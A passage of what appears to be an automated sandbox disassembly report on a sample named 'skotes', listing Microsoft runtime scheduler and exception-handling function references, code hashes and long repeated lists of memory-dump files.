                                                                                                                                            • List.LIBCONCRT ref: 00AE6B5B
                                                                                                                                            • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00AE6B68
                                                                                                                                              • Part of subcall function 00AE5EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00AE5EF7
                                                                                                                                              • Part of subcall function 00AE5EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00AE5F09
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3403738998-0
                                                                                                                                            • Opcode ID: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                            • Instruction ID: bd8a6edc0584ec0e65c37b2766b0b921997fd221b44183f898a8efd2c1c574b1
                                                                                                                                            • Opcode Fuzzy Hash: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                            • Instruction Fuzzy Hash: 09515D70E00249AFDB08DF65C595BEDB3B8BF18384F1444B9E915AB282DB30AE44CB90
                                                                                                                                            APIs
                                                                                                                                            • IsInExceptionSpec.LIBVCRUNTIME ref: 00AF53A0
                                                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 00AF53C7
                                                                                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 00AF54D3
                                                                                                                                            • IsInExceptionSpec.LIBVCRUNTIME ref: 00AF55AE
                                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 00AF5650
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                            • API String ID: 4162181273-393685449
                                                                                                                                            • Opcode ID: 741bd5d0b0791020c46f28a308cd94e3a86c4ea3d62f9b57e4fef3e235b5324d
                                                                                                                                            • Instruction ID: 24e8955f1286fb126f21147afe9dec340503c1f1755a91ba3760931d69c82e21
                                                                                                                                            • Opcode Fuzzy Hash: 741bd5d0b0791020c46f28a308cd94e3a86c4ea3d62f9b57e4fef3e235b5324d
                                                                                                                                            • Instruction Fuzzy Hash: 15C16571C0060DAFCF19DFE8C9809BEBBB5AF18311F14415AFA156B212C371DA51CB91
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00AE73B0
                                                                                                                                            • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00AE73F2
                                                                                                                                            • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 00AE740E
                                                                                                                                            • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00AE7419
                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00AE7440
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
                                                                                                                                            • String ID: count$ppVirtualProcessorRoots
                                                                                                                                            • API String ID: 3897347962-3650809737
                                                                                                                                            • Opcode ID: 994766c7abef0e521979081047292e48787383653dd3c69b195cabb48809901e
                                                                                                                                            • Instruction ID: 7c0ed2e8f37563f3db316a84fe142e3fc3db2374e7f01fc16e4b4cba2c26bc8f
                                                                                                                                            • Opcode Fuzzy Hash: 994766c7abef0e521979081047292e48787383653dd3c69b195cabb48809901e
                                                                                                                                            • Instruction Fuzzy Hash: 74216234A0024AAFCF14EF5AC5959EDBBB5BF09350F5440A9E905AB3A1DB70AE41CF90
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00AE7903
                                                                                                                                              • Part of subcall function 00AE5CB8: __EH_prolog3_catch.LIBCMT ref: 00AE5CBF
                                                                                                                                              • Part of subcall function 00AE5CB8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00AE5CF8
                                                                                                                                            • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00AE792A
                                                                                                                                            • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00AE7936
                                                                                                                                              • Part of subcall function 00AE5CB8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00AE5D70
                                                                                                                                              • Part of subcall function 00AE5CB8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00AE5D7E
                                                                                                                                            • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00AE7982
                                                                                                                                            • Concurrency::location::_Assign.LIBCMT ref: 00AE79A3
                                                                                                                                            • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 00AE79AB
                                                                                                                                            • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00AE79BD
                                                                                                                                            • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 00AE79ED
                                                                                                                                              • Part of subcall function 00AE691D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00AE6942
                                                                                                                                              • Part of subcall function 00AE691D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00AE6965
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
